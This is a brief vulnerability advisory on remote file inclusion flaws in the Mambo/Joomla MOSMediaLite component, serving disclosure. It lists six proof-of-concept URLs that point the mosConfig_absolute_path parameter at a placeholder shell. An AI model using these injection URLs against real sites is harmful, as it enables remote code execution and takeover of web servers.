|
Mambo/Joomla MOSMediaLite MosConfig_Absolute_Path Multiple Remote File Include Vulnerabilities
Attackers can use a browser to exploit these issues. The following proof-of-concept URIs are available: http://www.example.net/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=[shell] http://www.example.net/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=[shell] http://www.example.net/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=[shell] http://www.example.net/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=[shell] http://www.example.net/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=[shell] http://www.example.net/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=[shell] |
|
|
Privacy Statement |
